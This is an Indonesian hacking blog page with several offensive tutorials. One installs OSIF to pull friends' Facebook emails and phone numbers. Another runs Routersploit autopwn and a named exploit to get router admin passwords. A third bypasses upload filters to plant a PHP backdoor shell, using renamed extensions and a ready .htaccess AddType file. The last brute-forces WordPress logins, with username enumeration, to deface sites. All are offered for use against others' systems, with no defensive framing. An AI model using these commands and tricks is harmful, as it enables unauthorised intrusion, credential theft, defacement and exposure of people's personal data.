Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.
Showing posts with label web hacking. Show all posts
Showing posts with label web hacking. Show all posts

Tutorial install dan penggunaan osif di Termux , OSIF (Open Source Information Facebook)

Rio Setyawan 4:04 PM
OSIF (Open Source Information Facebook) merupakan tool berfungsi untuk melihat data-data penting seperti email, nomor hp, dan ID facebook pada akun teman kalian


Bukan hanya itu saja , masih banyak fitur di dalam tools osif
Antara lain auto colek, auto reaction, auto konfirmasi pertemanan, hapus semua status, hapus semua foto, unfollow semua teman dll.

Penasaran? Yuk langsung ke tutorial install nya.


  • Update dan upgrade termux dengan perintah

apt update && apt upgrade


  • Karena tool ini menggunakan bahasa pemrograman python maka harus install python terlebih dahulu dengan command

apt install python2


  • Kemudian install mechanize

pip2 install requests mechanize


  • Install git dengan perintah

apt install git


  • Clone tool OSIF nya dengan perintah

git clone https://github.com/CiKu370/OSIF.git


  • Masuk ke directory osif

cd OSIF


  • Install tool nya dengan perintah

pip2 install -r requirements.txt


  • Dan sekarang tinggal menjalankan tool OSIF dengan command

python2 osif.py


  • Login akun fb kalian dgn command

token



  • Masukan perintah help untuk melihat semua fitur osif dgn command

help

Sekian dulu artikel tentang osif, jika bingung bisa kontak melalu kontak form atau lewat komentar di bawah, terima kasih semoga bermanfaat.

Biar lebih jelas lihat video di bawah ini



Tutorial exploit router dengan Routersploit di android

Rio Setyawan 8:57 PM
Tutorial exploit router dengan Routersploit di android
Oke meneruskan artikel saya kemarin Cara install Routersploit di Android menggunakan Termux -  No Root,  jika belum membaca artikel saya kemarin bisa di baca dulu agar paham, 

Kalo artikel kemarin hanya tutorial install nya,  sekarang tutorial penggunaanya.

Sebelum memulai sedikit info tentang fitur-fitur Routersploit sbb.
  • Eksploitasi – modul yang mengambil keuntungan dari kerentanan
  • Diidentifikasicreds – modul dirancang untuk menguji kepercayaan terhadap layanan jaringan
  • Scanner – modul yang memeriksa apakah target rentan terhadap eksploitasi


Oke lanjut ke tutorialnya.
1. Pertama-tama buka dulu aplikasi Termux nya,

2. Pergi ke Directori Routersploit dengan ketikan perintah cd routersploit terus tekan enter

3. Selanjutnya ketikan perintah ./rsf.py lalu tekan enter

4. Kalau sudah ketikan perintah use scanners/autopwn lalu tekan enter
5. Selanjutnya setting target kalian dan port target nya

Ketikan perintah set target 192.168.151.1 lalu tekan enter (jika tidak terisi defaulnya 192.168.1.1)
set port 8080 lalu tekan enter (defaulnya 80)
set threads 10 lalu tekan enter (defaulnya 8)
Contohnya sbb
Tutorial exploit router dengan Routersploit di android

6. Jika sudah ketikan perintah run lalu tekan enter
Tunggu sampai kita mendapatkan password login routernya.

7. Jika sudah, tampilannya seperti ini (punya saya gagal untuk mengeskploitnya)
Tutorial exploit router dengan Routersploit di android

Nah, jika sukses kita akan mendapatkan kode explotnya.
Contoh : [+]  Device is vulnerable!
- exploits/asmax/ar_1004g_password_disclosure
8. Selanjutnya masukan kode exploits itu
Masukan perintah use exploits/asmax/ar_1004g_password_disclosure lalu tekan enter

9. Lalu ketikan perintah show options lalu tekan enter.
set target 192.168.151.1 lalu tekan enter.
Ketikan check lalu tekan enter
Ketik run lalu tekan enter

Maka login dan password akan muncul.

Semoga bermanfaat,  happy hacking

Cara install Routersploit di Android menggunakan Termux - No root

Rio Setyawan 10:52 PM
Cara install Routersploit di Android menggunakan Termux -  No root
Apa itu Routersploit??  Routersploit adalah tools linux yang bisa digunakan untuk exploitasi pada router guna mendapatkan password admin router tersebut tanpa melakukan bruteforce,

Cara install Routersploit di Android menggunakan Termux -  No root
Tools ini berjalan pada OS linux tapi kali ini kita akan menjalankanya di android,
Untuk menjalankanya di android kita menggunakan aplikasi tambahan yaitu Termux

Yang belum tau apa itu termux bisa membacanya di artikel saya sebelumnya
Download Termux -  Linux on Android

Kalau semua sudah siap saatnya install Routersploit nya

Sebelum Install Routersploit kita harus menginstall beberapa paket pendukung agar tools ini bisa di gunakan, dan berikut beberapa paket yg harus di install

apt install git
apt install python2
pip2 install requests

Jika semua sudah terinstall sekarang waktunya cloning script dari github dan install Routersploit

git clone https://github.com/reverse-shell/routersploit.git

cd routersploit

pip install -r requirements.txt termux-fix-shebang rsf.py

Tunggu proses pemasangan nya sampai selesai

Untuk menjalankanya cukup dengan perintah sbb
cd routersploit
./rsf.py

Mudah kan., untuk cara membobolnya tunggu artikel selanjutnya di blog Idiot Attacker ini.
Sekian dan terima kasih
Happy hacking

Trik Bypass upload shell Backdoor

Rio Setyawan 5:12 AM
Trik Bypass upload shell Backdoor
Mungkin dari kalian sering menjumpai web target yang sudah mendapatkan admin akses nya tapi gagal upload backdoor, salah satunya karena web target menolak upload file yang berektensi .php , nah disini ada sedikit trik untuk Bypass nya.

Dengan Rename nama Backdoor.

1.Upload shell berekstensi shell.jpg.PhP
Ingat, bukan .php tapi .PhP . Kadang server bingung dan akan di accept sebagai file .jpg , tapi ketika di eksekusi tetap akan terbaca file php.

2.Upload shell berekstensi shell.php;.jpg
Biasanya sih , server akan mengabaikan ekstensi setelah tanda " ; " sehingga file akan tetap terbaca .php

3.Upload shell berekstensi shell.php.test
Biasa nya ekstensi .test akan diabaikan , sehingga akan tetap dibaca sebagai file .php
4.Upload shell berekstensi shell.php.xxxjpg
ekstensi tidak jelas semacam .xxxjpg biasanya akan diabaikan server, dan akan dibaca sebagai file .php

5.Upload shell dengan ekstensi shell.php5 / php3
Biasanya cara ini yang jadi jurus pamungkas jika keempat cara diatas gagal. Kebanyakan server tetap akan mengeksekusi nya sebagai file .php

Dengan .htaccess

Cara nya sangat simple Upload file .htaccess di bawah ini di web target,  setelah itu upload shell kalian dengan ektensi png, jpg atau txt, Nantinya file .txt , png, dan jpg akan di baca oleh web server menjadi file php
AddType application/x-httpd-php .Arpns1986x
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt


Sampai disini dulu tutorialnya, tutorial selanjutnya menyusul, selengkapnya kalian praktekin sendiri, dan maaf jika ada kesalahan kata , Happy Hacking

Tutorial Deface dengan Wordpress Bruteforce [Perl]

Rio Setyawan 7:50 PM
Selamat pagi gan, pagi ini Idiot Attacker akan mengisi artikel di blog ini, biar tidak kelihatan sepi :D
kali ini Idiot Attacker akan membuat Artikel tentang Dunia peretasan lag, yaitu tentang Tutorial Deface dengan Wordpress Bruteforce [Perl].

Yup kali ini target CMS wordpress, yaitu dengan teknik Bruteforece

Apa Itu Bruteforce? Brute force ini adalah sebuah teknik serangan terhadap sebuah sistem keamanan  yang menggunakan percobaan terhadap semua kunci password yang memungkinkan atau istilah gampangnya mungkin menggunakan Random password/ password acak. Pendekatan ini pada awalnya merujuk pada sebuah program komputer yang mengandalkan kekuatan pemrosesan komputer dibandingkan kecerdasan manusia. Istilah brute force sendiri dipopulerkan oleh Kenneth Thompson, dengan mottonya: “When in doubt, use brute-force” (jika ragu, gunakan brute-force).
Baca juga :
Lebih lengkapnya bisa cari-cari di google lagi :p
Langsung saja ya gan, Sebagai Alatnya kali ini kita menggunakan Script Perl. Nati bisa kalian Download Di bawah.

Tutorial

Pertama-tama kita cari username nya dulu dengan cara mencoba 1 per 1 username dengan password acak aja,
Kalo keteranganya ERROR: Invalid username. Lost your password? berati username salah,
Sebaliknya  kalo keternganya ERROR: The password you entered for the username Admin is incorrect. Lost your password? berati username Benar.
Kalo udah ketemu username nya kita lanjut ke step selanjutnya.

Buka Script Perl nya dengan Menggunakan CMD, Anggap saja kalian udah pada tau.
Formatnya: wp.pl site.com username wordlist.txt
contoh Lihat gambar.
Tutorial Deface dengan Wordpress Bruteforce [Perl]
Tutorial Deface dengan Wordpress Bruteforce [Perl]





Lalu enter., Jika Password Sudah Ketemu Maka akan tampak seperti gambar di bawah ini.
Tutorial Deface dengan Wordpress Bruteforce [Perl]



Udah ketemu deh, Tinggal login di site.com/wp-login.php
Mudah kan, Sekian ya kawan tutorialnya, :) Happy Hacking :)






Tag: teknik brurteforce, tutorial deface, wp bruteforce, bruteforce attack, perl script, deface bruteforce